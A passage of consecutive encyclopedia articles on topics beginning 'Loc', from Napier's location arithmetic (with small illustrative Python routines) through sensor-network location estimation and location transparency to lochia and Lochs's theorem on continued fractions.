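    return sum(1 << ascii_lowercase.index(ch) for ch in s)

print(to_location(87))          # 'abceg' = 1 + 2 + 4 + 16 + 64
print(from_location("abceg"))   # 87
print(from_location("gecba"))   # 87: digit order does not matter
```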
As in any numeral system using sign-value notation (but not those using positional notation ), digits (letters) can be repeated such that multiple numerals can represent a single number. For example: abbc (= 1 + 2 + 2 + 4) and ad (= 1 + 8) both represent 9.
Additionally, the order of digits does not matter. For example: ad and da both represent 9.
Because each digit in a location numeral represents twice the value of its next-lower digit, replacing any two occurrences of the same digit with one of the next-higher digit does not change the numeral's numeric value. Thus, repeatedly applying the rules of replacement aa → b , bb → c , cc → d , etc. to a location numeral removes all repeated digits from that numeral.
Napier called this process abbreviation and the resulting location numeral the abbreviated form of that numeral; he called location numerals containing repeated digits extended forms . Each number can be represented by a unique abbreviated form, not considering the order of its digits (e.g., abc , bca , cba , etc. all represent the number 7).
Location numerals allow for a simple and intuitive algorithm for addition:
For example, to add 157 = acdeh and 230 = bcfgh , join the numerals end-to-end: acdehbcfgh ,
rearrange the digits of the previous result (because the digits of acdehbcfgh are not in ascending order): abccdefghh ,
and abbreviate the previous result: abhi .
The final result, abhi , equals 387 ( abhi = 2 0 + 2 1 + 2 7 + 2 8 = 1 + 2 + 128 + 256 = 387); this is the same result achieved by adding 157 and 230 in decimal notation.
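A compact sketch of this addition algorithm (illustrative code; the helper names are assumptions):

```python
# Napier's addition: join the numerals, sort, then abbreviate by
# replacing pairs of equal digits with one next-higher digit.
from string import ascii_lowercase as L
from collections import Counter

def abbreviate(s):
    counts = Counter(L.index(ch) for ch in s)
    out, carry, i = [], 0, 0
    top = max(counts, default=-1)
    while i <= top or carry:
        total = counts.get(i, 0) + carry
        if total % 2:               # an unpaired digit stays
            out.append(L[i])
        carry = total // 2          # each pair becomes one higher digit
        i += 1
    return "".join(out)

def add(x, y):
    # sorting mirrors the "rearrange" step in the text
    return abbreviate("".join(sorted(x + y)))

print(add("acdeh", "bcfgh"))  # 'abhi', i.e. 157 + 230 = 387
```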
Subtraction is also intuitive, but may require expanding abbreviated forms to extended forms to perform borrows .
Write the minuend (the number to be diminished) and remove from it all the digits appearing in the subtrahend (the number being subtracted). In case a digit to be removed does not appear in the minuend, borrow it by expanding the next-larger unit. Repeat until all the digits of the subtrahend have been removed.
A few examples show it is simpler than it sounds. For instance, to compute 10 − 3 = bd − ab : removing b from bd leaves d ; since a does not appear in d , expand d = cc = c + bb = c + b + aa and remove one a , leaving abc = 7.
Napier proceeded to the rest of arithmetic, that is multiplication, division and square root, on an abacus, as was common in his times. However, since the development of microprocessor computers, many applicable algorithms based on doubling and halving have been developed or revived.
Doubling is done by adding a numeral to itself, which means doubling each of its digits. This gives an extended form, which has to be abbreviated if needed. This operation can be done in one step by changing each digit of a numeral to the next larger digit. For example, the double of a is b , the double of b is c , the double of ab is bc , the double of acfg is bdgh , etc.
Similarly, multiplying by a power of two is just a translation of digits. To multiply by c = 4, for example, transform the digits a → c , b → d , c → e , ...
Halving is the reverse of doubling: change each digit to the next smaller digit. For example, the half of bdgh is acfg .
One sees immediately that it is only feasible when the numeral to be halved does not contain an a (or, if the numeral is extended, an odd number of a s). In other words, an abbreviated numeral is odd if it contains an a and even if it does not.
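Both operations are single-step digit shifts; in code:

    def double(numeral):
        # shift every digit up one letter: a -> b, b -> c, ...
        return "".join(POWERS[POWERS.index(d) + 1] for d in numeral)

    def halve(numeral):
        # shift every digit down one letter; valid only for even numerals
        return "".join(POWERS[POWERS.index(d) - 1] for d in numeral)

    print(double("acfg"))   # 'bdgh'
    print(halve("bdgh"))    # 'acfg'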
With these basic operations (doubling and halving), all the binary algorithms can be adapted, starting with, but not limited to, the Bisection method and Dichotomic search .
Napier performed multiplication and division on an abacus, as was common in his times. However, Egyptian multiplication gives an elegant way to carry out multiplication without tables using only doubling, halving and adding.
Multiplying a single-digit number by another single-digit number is a simple process. Because all letters represent a power of 2, multiplying digits is the same as adding their exponents. This can also be thought of as finding the index of one digit in the alphabet ( a = 0, b = 1, ...) and incrementing the other digit by that amount in terms of the alphabet ( b + 2 => d ).
For example, multiply 4 = c by 16 = e
c * e = 2^2 * 2^4 = 2^6 = g
or...
AlphabetIndex ( c ) = 2, so... e => f => g
To find the product of two multiple digit numbers, make a two column table. In the left column write the digits of the first number, one below the other. For each digit in the left column, multiply that digit and the second number and record it in the right column. Finally, add all the numbers of the right column together.
As an example, multiply 238 = bcdfgh by 13 = acd
The result is the sum of the numerals in the right column: bcdfgh + defhij + efgijk = bcddeefffgghhiijjk = bcekl = 2 + 4 + 16 + 1024 + 2048 = 3094.
It is interesting to notice that the left column can also be obtained by successive halves of the first number, from which the even numbers are removed. In our example, acd , bc (even), ab , a . Noticing that the right column contains successive doubles of the second number shows why the peasant multiplication is exact.
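The scheme translates directly into a short routine built on the helpers above: halve the first factor (dropping its a when it is odd), double the second, and add up the doubles that face odd halves.

    def multiply(x, y):
        total = ""
        while x:
            if "a" in x:                  # x is odd: this row's double contributes
                total = add(total, y)
                x = x.replace("a", "")    # subtract 1 before halving
            x = halve(x)
            y = double(y)
        return total

    print(multiply("bcdfgh", "acd"))   # 'bcekl': 238 * 13 = 3094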
Division can be carried out by successive subtractions: the quotient is the number of times the divisor can be subtracted from the dividend, and the remainder is what is left after all the possible subtractions.
This process, which can be very long, may be made efficient if instead of the divisor itself we subtract multiples of the divisor, and computations are easier if we restrict ourselves to multiples by a power of 2.
In fact, this is what we do in the long division method.
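A sketch of this power-of-two long division, using the conversion helpers above for brevity:

    def divide(dividend, divisor):
        n, d = to_int(dividend), to_int(divisor)
        q = 0
        for shift in range(n.bit_length() - d.bit_length(), -1, -1):
            if (d << shift) <= n:     # subtract divisor * 2^shift once
                n -= d << shift
                q |= 1 << shift
        return to_location(q), to_location(n)   # quotient, remainder

    print(divide("acfghi", "acd"))   # ('acf', 'c'): 485 = 13 * 37 + 4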
Location arithmetic uses a square grid where each square on the grid represents a value. Two sides of the grid are marked with
increasing powers of two. Any inner square can be identified by two numbers on these two sides, one being vertically below the inner
square and the other to its far right. The value of the square is the product of these two numbers.
For instance, the square in this example grid represents 32, as it is the product of 4 on the right column and 8 from the bottom row. The grid itself can be any size, and larger grids simply permit us to handle larger numbers.
Notice that moving either one square to the left or one square up doubles the value. This property can be used to perform binary
addition using just a single row of the grid.
First, lay out a binary number on a row using counters to represent the 1s in the number. For example, 29 (= 11101 in binary) would be placed on the board like this:
The number 29 is clearly the sum of the values of the squares on which there are counters. Now overlay the second number on this row. Say we place 9 (= 1001 in binary) on it like this.
The sum of these two numbers is just the total value represented by the counters on the board, but some of the squares have more than one counter. Recall, however, that moving one square to the left doubles a counter's value. So we replace two counters on a square with one counter to its left without changing the total value on the board. Note that this is the same idea used to abbreviate
location numerals. Let's start by replacing the rightmost pair of counters with a counter to its left, giving:
We still have another square with two counters on it, so we do it again:
But replacing this pair created another square with two counters on it, so we replace a third time:
Now each square has just one counter, and reading off the result in binary 100110 (= 38) gives the correct result.
Subtracting is not much more complicated than addition: instead of adding counters on the board we remove them. To "borrow" a value, we replace a counter on a square with two to its right.
Let's see how we might subtract 12 from 38. First place 38 (= 100110 in binary) on a row, and then place 12 (= 1100 in binary) under it:
For every counter on the lower row that has a counter above it, remove both counters. We can remove one such pair on the board,
resulting in:
Now we need to "borrow" counters to get rid of the remaining counter on the bottom. First replace the leftmost counter on the top row with two to its right:
Now replace one of the two counters with two more to its right, giving:
We can now take away one of the counters on the top row with the remaining counter on the bottom row:
and read off 26, the final result.
Unlike addition and subtraction, the entire grid is used to multiply, divide, and extract square roots. The grid has some useful properties utilized in these operations. First, all the squares on any diagonal going from the bottom left to the top right have the same value.
Since a diagonal move can be broken down into a move to the right (which halves the value) followed by a move
up (which doubles the value), the value of the square stays the same.
In conjunction with that diagonal property, there is a quick way to divide the numbers on the bottom and right edges of the grid.
To perform 32÷8, one locates the dividend 32 along the right side and the divisor 8 on the bottom edge of the grid. Extending a diagonal from the dividend to the square where it intersects a vertical line of the divisor, the quotient lies at the right end of the grid from this square, in this example 4.
This works as moving along the diagonal does not change the value; the value of the square on the intersection is still the dividend. Thus, the dividend is the product of the squares along the bottom and right edge. Since the square on the bottom edge is the divisor, the square on the right edge is the quotient.
To multiply a pair of binary numbers, first mark the two numbers
on the bottom and the right side of the grid. Say we want to
multiply 22 (= 10110) by 9 (= 1001).
Now place counters at every "intersection" of vertical and
horizontal rows of the 1s in each number.
Notice that each row of counters on the grid is just
22 multiplied by some
power of two. In fact, the total value of the counters is the
sum of two rows
So the counters on the board actually represent the product
of the two numbers, except it is not possible to "read off" the
answer just yet.
Recall that moving counters diagonally does not change the value,
so move all the counters on inner squares diagonally until they
hit either the bottom row or the left column.
Now we make the same moves we did for addition. Replace two counters on a square with one to its left. If the square is on the left column, replace two counters with one above it. Recall that the value of a square doubles if you move up, so this does not change the value on the grid.
Let's first replace the two counters on the second square at the bottom with one to its left which leaves two counters at the corner.
Finally, replace the two counters on the corner with one above it
and "read off" the binary number in an L-shaped fashion, starting from
the top left down to the bottom left corner, and then over to the
bottom right.
Read the counters along the L but do not double count the corner square.
You will read the binary result 11000110 = 198 which is indeed 22*9.
Why can we read the binary number in this L-shaped fashion? The
bottom row is of course just the first six powers of two, but
notice that the leftmost column has the next five powers of
two. So we can directly read off an 11 digit binary number from
the L-shaped set of 11 squares that lie along the left and bottom
sides of the grid.
Our small 6x6 grid can only multiply numbers each up to 63, and in general an n x n grid can multiply two numbers each up to 2^n − 1. The capacity scales very fast: a board with 20 squares per side, for instance, can multiply numbers each up to a little over one million.
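Because a counter at the intersection of bit i (bottom edge) and bit j (right edge) lies on the diagonal worth 2^(i+j), the whole board procedure, sliding counters to the bottom row and then carrying pairs leftward, can be simulated compactly; a sketch:

    from collections import Counter

    def grid_multiply(x, y):
        # slide each counter to the bottom row: its square index is i + j
        board = Counter(i + j
                        for i in range(x.bit_length()) if (x >> i) & 1
                        for j in range(y.bit_length()) if (y >> j) & 1)
        if not board:
            return 0
        e, top = 0, max(board)
        while e <= top:
            if board[e] >= 2:              # two counters -> one to the left
                board[e + 1] += board[e] // 2
                board[e] %= 2
                top = max(top, e + 1)
            e += 1
        return sum(1 << e for e, c in board.items() if c)

    print(grid_multiply(22, 9))   # 198, read off as binary 11000110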
Martin Gardner presented a slightly easier to understand
version [2] of Napier's division method, which is what is
shown here.
Division works pretty much the reverse of multiplication. Say we want
to divide 485 by 13. First place counters for 485 (= 111100101) along
the bottom edge and mark 13 (= 1101) along the right edge. To save
space, we'll just look at a rectangular portion of the board because
that's all we actually use.
Starting from the left, the game is to move counters diagonally into
"columns of divisors" (that is, with one counter on each row marked
with a 1 from the divisor.) Let's demonstrate this with the leftmost
block of counters.
Now the next block of counters we might try would begin with the
leftmost counter on the bottom, and we might attempt something like
except that we do not have any counters that we can move diagonally from the bottom edge into squares that would form the rest of the "column of divisors."
In such cases, we instead "double down" the counter on the bottom row and form a column one over to the right. As you will soon see, it will always be possible to form a column this way. So first replace the counter on the bottom with two to its right.
and then move one diagonally to the top of the column, and move
another counter located on the edge of the board into its spot.
It looks like we still do not have a counter on the bottom edge to move
diagonally into the remaining square, but notice that we can instead
double down the leftmost counter again and then move it into the
desired square.
and now move one counter diagonally to where we want it.
Let's proceed to build the next column. Once again, notice that moving the leftmost counter to the top of the column does not leave enough counters at the bottom to fill in the remaining squares.
So we double down the counter and move one diagonally into the next column over. Let's also move the rightmost counter into the column, and here is how it looks after these steps.
We still have a missing square, but we just double down again and move
the counter into this spot and end up with
At this point, the counter on the bottom edge is so far to the right
that it cannot go diagonally to the top of any column, which signals
that we are done.
The result is "read" off the columns—each column with counters is
treated as a 1 and empty columns are 0. So the result is
100101 (= 37) and the remainder is the binary value of any counters
still left along the bottom edge. There is one counter on the third
column from the right, so we read it as 100 (= 4) and we get 485
÷ 13 = 37 with a remainder 4. | https://en.wikipedia.org/wiki/Location_arithmetic |
Location awareness refers to devices that can determine their location. Navigational instruments provide location coordinates for vessels and vehicles. Surveying equipment identifies location with respect to a well-known reference location, such as a fixed wireless communications device.
The term applies to navigating , real-time locating , and positioning support with global, regional or local scope. The term has been applied to traffic , logistics , business administration , and leisure applications. Location awareness is supported by navigation systems , positioning systems , and/or locating services .
Location awareness without the active participation of the device is known as non-cooperative locating or detection.
The term originated for configuration settings of network systems, and addressed network entities. Network location awareness (NLA) services collect network configuration and location information, and notify applications when this information changes. With the advent of global navigation satellite systems ( GNSS ) and radio-equipped mobile devices, the term was redefined to include consumer-focused applications.
While location awareness began as a matter of static user location, the notion was extended to reflect movement. Context models have been proposed [ 1 ] to support context-aware applications which use location to tailor interfaces, refine application-relevant data, increase the precision of information retrieval, discover services, make user interaction implicit and build smart environments. For example, a location-aware mobile phone may confirm that it is currently in a building. [ 2 ]
Description in logical terms uses a structured textual form. International standardisation offers a common method using ISO/TS 16952 [ 3 ] as originated with German standards DIN EN 61346 [ 4 ] and DIN EN 81346. [ 5 ]
Location in mathematical terms offers coordinates that refer to a nominated point of reference .
Location in network terms relates to locating network nodes. These include:
"Crisp" locating offers precise coordinates, using wireless signals or optical sighting, possibly [ attribution needed ] with phase angle measurements. Coordinates are relative to either a standardized system of coordinates, e.g., WGS84 , or a fixed object such as a building plan. Real-time locating adds timely delivery of results, especially for moving targets. Real time locating is defined with ISO / IEC 19762-5 and ISO/IEC 24730-1. [ 14 ] Fuzzy locating offers less precision, e.g., presence "near" a point of reference. Measuring wireless power levels can supply this degree of precision. Less sophisticated systems can use wireless distance measurements to estimate a point of reference in polar coordinates (distance and direction) from another site. Index locating indicates presence at a known location, as with fixed RFID reader's and RFID tags. [ 15 ]
Location-aware systems address the acquisition of coordinates in a grid (for example using distance metrics and lateration algorithms) or at least distances to reference points (for example discriminating presence at a certain choke point on a corridor or in a room of a building). [ 16 ]
Navigation and reckoning are key concerns for seafarers , aviators and professional drivers. The task is to dynamically determine the current location and the time, distance and direction to a destination. Radar served regional demand and NAVSTAR satellite systems global demand. Global navigation satellite systems ( GNSS ) have become ubiquitous in long-haul transport operation and are becoming a standard automobile feature. [ 17 ]
Surveying is the static complement to navigating. It is essential for delineating land ownership and for architects and civil engineers designing construction projects. Optical surveying technology preceded laser triangulating aids. [ 18 ]
Currently location awareness is applied to design innovative process controls , and is integral to ubiquitous and wearable computing . On mobile devices, location aware search can prioritize results that are close to the device. Conversely, the device location can be disclosed to others, at some cost to the bearer's privacy. [ 19 ]
RFID provides a time/location reference for an object, but does not indicate that the object remains at that location, which is sufficient for applications that limit access, such as tracking objects entering and leaving a warehouse, or for objects moving on a fixed route, such as charging tolls for crossing a bridge. [ 20 ] [ 21 ]
Location awareness enables new applications for ubiquitous computing systems and mobile phones . Such applications include the automatic reconfiguration of a computing device to suit the location in which it is currently being used (examples include ControlPlane and Locamatic ), or publishing a user's location to appropriate members of a social network, and allowing retailers to publish special offers to potential customers who are near to the retailers. Allegedly, individuals gain self confidence with confirmation of current whereabouts . [ 22 ]
While governments have created global systems for computing locations, independent localized systems exist at scales ranging from one building to sub-national regions.
Such solutions may apply concepts of real-time locating system (RTLS) and wireless personal area network (WPAN), wireless LAN or DECT , with results in proprietary terms of floor plans or room numbers. Local systems degrade as distance from the locality increases. Applications include the automatic reconfiguration of a computing device to suit the location in which it is currently being used.
This approach uses for example mobile phone systems, such as 3GPP , GSM or LTE , typically returning information in standardized coordinates as with WGS84 in standardized formats such as National Marine Electronics Association (NMEA) for outdoor usage or in symbolic coordinates referring to street addresses.
This approach relies on global navigation satellite system (GNSS) technology generally adopting WGS84 and NMEA . Applications include avalanche rescue or emergency and mountain rescue as well as UAVs which are commonly used in search and rescue , (SAR) and combat search and rescue (CSAR).
Network location awareness ( NLA ) describes the location of a node in a network. [ 23 ] [ unreliable source? ] [ 24 ] | https://en.wikipedia.org/wiki/Location_awareness |
Location estimation in wireless sensor networks is the problem of estimating the location of an object from a set of noisy measurements. These measurements are acquired in a distributed manner by a set of sensors.
Many civilian and military applications require monitoring that can identify objects in a specific area, such as monitoring the front entrance of a private house by a single camera. Monitored areas that are large relative to objects of interest often require multiple sensors (e.g., infra-red detectors) at multiple locations. A centralized observer or computer application monitors the sensors. The communication, power, and bandwidth requirements call for an efficient design of the sensing, transmission, and processing stages.
The CodeBlue system [ 1 ] of Harvard University is an example where a vast number of sensors distributed among hospital facilities allow staff to locate a patient in distress. In addition, the sensor array enables online recording of medical information while allowing the patient to move around. Military applications (e.g. locating an intruder into a secured area) are also good candidates for setting a wireless sensor network.
Let θ {\displaystyle \theta } denote the position of interest. A set of N {\displaystyle N} sensors
acquire measurements x n = θ + w n {\displaystyle x_{n}=\theta +w_{n}} contaminated by an
additive noise w n {\displaystyle w_{n}} with some known or unknown probability density function (PDF). The sensors transmit measurements to a central processor. The n {\displaystyle n} th sensor encodes x n {\displaystyle x_{n}} by a function m n ( x n ) {\displaystyle m_{n}(x_{n})} . The application processing the data applies a pre-defined estimation rule θ ^ = f ( m 1 ( x 1 ) , … , m N ( x N ) ) {\displaystyle {\hat {\theta }}=f(m_{1}(x_{1}),\dots ,m_{N}(x_{N}))} . The set of message functions m n , 1 ≤ n ≤ N {\displaystyle m_{n},\,1\leq n\leq N} and the fusion rule f ( m 1 ( x 1 ) , … , m N ( x N ) ) {\displaystyle f(m_{1}(x_{1}),\dots ,m_{N}(x_{N}))} are
designed to minimize estimation error.
For example: minimizing the mean squared error (MSE), E ‖ θ − θ ^ ‖ 2 {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|^{2}} .
Ideally, sensors transmit their measurements x n {\displaystyle x_{n}} directly to the processing center, that is m n ( x n ) = x n {\displaystyle m_{n}(x_{n})=x_{n}} . In this
setting, the maximum likelihood estimator (MLE) θ ^ = 1 N ∑ n = 1 N x n {\displaystyle {\hat {\theta }}={\frac {1}{N}}\sum _{n=1}^{N}x_{n}} is an unbiased estimator whose MSE is E ‖ θ − θ ^ ‖ 2 = var ( θ ^ ) = σ 2 N {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|^{2}={\text{var}}({\hat {\theta }})={\frac {\sigma ^{2}}{N}}} assuming white Gaussian noise w n ∼ N ( 0 , σ 2 ) {\displaystyle w_{n}\sim {\mathcal {N}}(0,\sigma ^{2})} . The next sections suggest
alternative designs when the sensors are bandwidth constrained to
1 bit transmission, that is m n ( x n ) {\displaystyle m_{n}(x_{n})} =0 or 1.
A system for Gaussian noise w n ∼ N ( 0 , σ 2 ) {\displaystyle w_{n}\sim {\mathcal {N}}(0,\sigma ^{2})} can be designed as follows: each sensor quantizes its measurement to a single bit by comparing it against a common threshold τ {\displaystyle \tau } and transmits the result.
Here τ {\displaystyle \tau } is a parameter leveraging our prior knowledge of the
approximate location of θ {\displaystyle \theta } . In this design, the random value
of m n ( x n ) {\displaystyle m_{n}(x_{n})} is distributed Bernoulli ~ ( q = F ( τ − θ ) ) {\displaystyle (q=F(\tau -\theta ))} . The
processing center averages the received bits to form an estimate q ^ {\displaystyle {\hat {q}}} of q {\displaystyle q} , which is then used to find an estimate of θ {\displaystyle \theta } . It can be verified that for the optimal (and
infeasible) choice of τ = θ {\displaystyle \tau =\theta } the variance of this estimator
is π σ 2 4 {\displaystyle {\frac {\pi \sigma ^{2}}{4}}} which is only π / 2 {\displaystyle \pi /2} times the
variance of MLE without bandwidth constraint. The variance
increases as τ {\displaystyle \tau } deviates from the real value of θ {\displaystyle \theta } , but it can be shown that as long as | τ − θ | ∼ σ {\displaystyle |\tau -\theta |\sim \sigma } the factor in the MSE remains approximately 2. Choosing a suitable value for τ {\displaystyle \tau } is a major disadvantage of this method since our model does not assume prior knowledge about the approximated location of θ {\displaystyle \theta } . A coarse estimation can be used to overcome this limitation. However, it requires additional hardware in each of
the sensors.
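A minimal simulation of such a design, as a sketch rather than the paper's exact construction: assume each sensor reports the bit 1 when x_n < τ, so the average of the received bits estimates q = F(τ − θ), which the fusion center inverts through the Gaussian CDF (the function name and the clipping step are ours).

    import numpy as np
    from scipy.stats import norm

    def one_bit_estimate(theta, sigma, tau, n_sensors, seed=0):
        rng = np.random.default_rng(seed)
        x = theta + sigma * rng.standard_normal(n_sensors)   # noisy measurements
        q_hat = np.mean(x < tau)                             # average of the 1-bit messages
        q_hat = np.clip(q_hat, 0.5 / n_sensors, 1 - 0.5 / n_sensors)  # keep the quantile finite
        return tau - sigma * norm.ppf(q_hat)                 # invert q = Phi((tau - theta) / sigma)

    print(one_bit_estimate(theta=1.0, sigma=1.0, tau=1.2, n_sensors=100_000))  # close to 1.0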
A system design with arbitrary (but known) noise PDF can be found in [ 3 ] . In this setting it is assumed that both θ {\displaystyle \theta } and
the noise w n {\displaystyle w_{n}} are confined to some known interval [ − U , U ] {\displaystyle [-U,U]} . The
estimator of [ 3 ] also reaches an MSE which is a constant factor
times σ 2 N {\displaystyle {\frac {\sigma ^{2}}{N}}} . In this method, the prior knowledge of U {\displaystyle U} replaces
the parameter τ {\displaystyle \tau } of the previous approach.
A noise model may be sometimes available while the exact PDF parameters are unknown (e.g. a Gaussian PDF with unknown σ {\displaystyle \sigma } ). The idea proposed in [ 4 ] for this setting is to use two
thresholds τ 1 , τ 2 {\displaystyle \tau _{1},\tau _{2}} , such that N / 2 {\displaystyle N/2} sensors are designed
with m A ( x ) = I ( x − τ 1 ) {\displaystyle m_{A}(x)=I(x-\tau _{1})} , and the other N / 2 {\displaystyle N/2} sensors use m B ( x ) = I ( x − τ 2 ) {\displaystyle m_{B}(x)=I(x-\tau _{2})} . The processing center estimation rule is generated as follows:
As before, prior knowledge is necessary to set values for τ 1 , τ 2 {\displaystyle \tau _{1},\tau _{2}} to have an MSE with a reasonable factor
of the unconstrained MLE variance.
The system design of [ 3 ] also covers the case where the structure of the noise PDF is unknown. The following model is considered for this scenario: θ {\displaystyle \theta } and the noise w n {\displaystyle w_{n}} are confined to [ − U , U ] {\displaystyle [-U,U]} , but the noise may follow any PDF in a known class P {\displaystyle {\mathcal {P}}} .
In addition, the message functions are limited to have the form m n ( x n ) = I ( x n ∈ S n ) ,
where each S n {\displaystyle S_{n}} is a subset of [ − 2 U , 2 U ] {\displaystyle [-2U,2U]} . The fusion estimator is also restricted to be linear, i.e. θ ^ = ∑ n = 1 N α n m n ( x n ) {\displaystyle {\hat {\theta }}=\sum \limits _{n=1}^{N}\alpha _{n}m_{n}(x_{n})} .
The design should set the decision intervals S n {\displaystyle S_{n}} and the
coefficients α n {\displaystyle \alpha _{n}} . Intuitively, one would allocate N / 2 {\displaystyle N/2} sensors to encode the first bit of θ {\displaystyle \theta } by setting their decision interval to be [ 0 , 2 U ] {\displaystyle [0,2U]} , then N / 4 {\displaystyle N/4} sensors would encode the second bit by setting their decision interval to [ − U , 0 ] ∪ [ U , 2 U ] {\displaystyle [-U,0]\cup [U,2U]} and so on. It can be shown that these decision
intervals and the corresponding set of coefficients α n {\displaystyle \alpha _{n}} produce a universal δ {\displaystyle \delta } -unbiased estimator, which is an
estimator satisfying | E ( θ − θ ^ ) | < δ {\displaystyle |\mathbb {E} (\theta -{\hat {\theta }})|<\delta } for every possible value of θ ∈ [ − U , U ] {\displaystyle \theta \in [-U,U]} and for every realization of w n ∈ P {\displaystyle w_{n}\in {\mathcal {P}}} . In fact, this intuitive
design of the decision intervals is also optimal in the following
sense. The above design requires N ≥ ⌈ log 8 U δ ⌉ {\displaystyle N\geq \lceil \log {\frac {8U}{\delta }}\rceil } to satisfy the universal δ {\displaystyle \delta } -unbiased property while theoretical arguments show that
an optimal (and a more complex) design of the decision intervals
would require N ≥ ⌈ log 2 U δ ⌉ {\displaystyle N\geq \lceil \log {\frac {2U}{\delta }}\rceil } , that is:
the number of sensors is nearly optimal. It is also argued in [ 3 ] that if the targeted MSE E ‖ θ − θ ^ ‖ 2 ≤ ϵ 2 {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|^{2}\leq \epsilon ^{2}} uses a small
enough ϵ {\displaystyle \epsilon } , then this design requires a factor of 4 in the
number of sensors to achieve the same variance of the MLE in
the unconstrained bandwidth settings.
The design of the sensor array requires optimizing the power
allocation as well as minimizing the communication traffic of the
entire system. The design suggested in [ 5 ] incorporates probabilistic quantization in
sensors and a simple optimization program that is solved in the
fusion center only once. The fusion center then broadcasts a set
of parameters to the sensors that allows them to finalize their
design of messaging functions m n ( ⋅ ) {\displaystyle m_{n}(\cdot )} as to meet the energy
constraints. Another work employs a similar approach to address
distributed detection in wireless sensor arrays. [ 6 ] | https://en.wikipedia.org/wiki/Location_estimation_in_sensor_networks |
In computer networks, location transparency is the use of names to identify network resources, rather than their actual location. [ 1 ] [ 2 ] For example, files are accessed by a unique file name, but the actual data is stored in physical sectors scattered around a disk in either the local computer or in a network. In a location transparency system, the actual location where the file is stored doesn't matter to the user. A distributed system will need to employ a networked scheme for naming resources.
The main benefit of location transparency is that it no longer matters where the resource is located. Depending on how the network is set up, the user may be able to obtain files that reside on another computer connected to the particular network. [ 1 ] This means that the location of a resource doesn't matter to either the software developers or the end-users. This creates the illusion that the entire system is located in a single computer, which greatly simplifies software development.
An additional benefit is the flexibility it provides. System resources can be moved to a different computer at any time without disrupting any software systems running on them. By simply updating the location associated with the named resource, every program using that resource will be able to find it. [ 2 ] Location transparency also makes resources easier to use: data can be accessed by almost anyone who can connect to the network, knows the right file names, and has proper security credentials. [ 1 ]
| https://en.wikipedia.org/wiki/Location_transparency |
In the field of obstetrics , lochia is the vaginal discharge after giving birth, containing blood , mucus , and uterine tissue. [ 1 ] Lochia discharge typically continues for four to eight weeks after childbirth , [ 2 ] a time known as the postpartum period or puerperium. A 2016 review ties this "lochial period" to worldwide customs of postpartum confinement , a time for the new mother and baby to bond. [ 3 ]
Lochia is sterile for the first two days, but not so by the third or fourth day, as the uterus begins to be colonized by vaginal commensals such as non-hemolytic streptococci and E. coli . [ 4 ] The Cleveland Clinic recommends that pads be used instead of tampons to absorb the fluid as materials should not be inserted in the vagina soon after childbirth. [ 5 ]
It progresses through three stages: lochia rubra (red), lochia serosa (pinkish-brown), and lochia alba (yellowish-white). [ 6 ]
In general, lochia has an odor similar to that of normal menstrual fluid. Any offensive odor or change to a greenish color indicates contamination by organisms such as Chlamydia or Staphylococcus saprophyticus . [ 8 ]
Lochia that is retained within the uterus is known as lochiostasis [ 9 ] or lochioschesis, and can result in lochiometra [ 10 ] (distention of the uterus - pushing it out of shape). Lochiorrhea describes an excessive flow of lochia and can indicate infection. [ 11 ] | https://en.wikipedia.org/wiki/Lochia |
Lochium Funis ( Latin for the log and line ) was a constellation created by Johann Bode in 1801 next to the constellation Pyxis , an earlier invention of Nicolas Louis de Lacaille . It represented the log and line used by seamen for measuring a ship's speed through the water. It was never used by other astronomers.
| https://en.wikipedia.org/wiki/Lochium_Funis |
In number theory , Lochs's theorem concerns the rate of convergence of the continued fraction expansion of a typical real number. A proof of the theorem was published in 1964 by Gustav Lochs . [ 1 ]
The theorem states that for almost all real numbers in the interval (0,1), the number of terms m of the number's continued fraction expansion that are required to determine the first n places of the number's decimal expansion behaves asymptotically as follows: lim n → ∞ m / n = 6 ln 2 ln 10 / π 2 ≈ 0.97027014.
As this limit is only slightly smaller than 1, this can be interpreted as saying that each additional term in the continued fraction representation of a "typical" real number increases the accuracy of the representation by approximately one decimal place. The decimal system is the last positional system for which each digit carries less information than one continued fraction quotient; going to base-11 (changing ln ( 10 ) {\displaystyle \ln(10)} to ln ( 11 ) {\displaystyle \ln(11)} in the equation) makes the above value exceed 1.
The reciprocal of this limit, π 2 / ( 6 ln 2 ln 10 ) ≈ 1.03064083, is twice the base-10 logarithm of Lévy's constant .
A prominent example of a number not exhibiting this behavior is the golden ratio —sometimes known as the " most irrational " number—whose continued fraction terms are all ones, the smallest possible in canonical form. On average it requires approximately 2.39 continued fraction terms per decimal digit. [ 3 ]
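The statement can be explored numerically. The sketch below counts continued-fraction terms until two consecutive convergents agree on the first n decimal places, a practical stand-in for Lochs's exact criterion; the helper name and the agreement test are ours, and Python's decimal module supplies the precision.

    from decimal import Decimal, getcontext
    import random

    getcontext().prec = 500

    def lochs_ratio(x, n):
        # m/n, where m counts partial quotients of x in (0,1) until
        # consecutive convergents fix the first n decimal places
        p_prev, p = 1, 0              # convergent numerators p_{-1}, p_0
        q_prev, q = 0, 1              # convergent denominators q_{-1}, q_0
        y, last, m = 1 / x, None, 0
        while True:
            a = int(y)                # next partial quotient
            p_prev, p = p, a * p + p_prev
            q_prev, q = q, a * q + q_prev
            m += 1
            digits = 10 ** n * p // q       # first n decimal places of p/q
            if digits == last:
                return m / n
            last = digits
            y = 1 / (y - a)           # assumes enough terms before termination

    golden = (Decimal(5).sqrt() - 1) / 2    # all partial quotients equal 1
    print(lochs_ratio(golden, 60))          # about 2.39 terms per digit

    random.seed(1)
    typical = Decimal("0." + "".join(random.choice("0123456789") for _ in range(400)))
    print(lochs_ratio(typical, 120))        # close to 0.9703 terms per digit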
The proof assumes basic properties of continued fractions .
Let T : x ↦ 1 / x mod 1 {\displaystyle T:x\mapsto 1/x\mod 1} be the Gauss map.
Let ρ ( t ) = 1 ( 1 + t ) ln 2 {\displaystyle \rho (t)={\frac {1}{(1+t)\ln 2}}} be the probability density function for the Gauss distribution, which is preserved under the Gauss map.
Since the probability density function is bounded above and below, a set is negligible with respect to the Lebesgue measure if and only if it is negligible with respect to the Gauss distribution.
Lemma. 1 n ln T n x → 0 {\textstyle {\frac {1}{n}}\ln T^{n}x\to 0} .
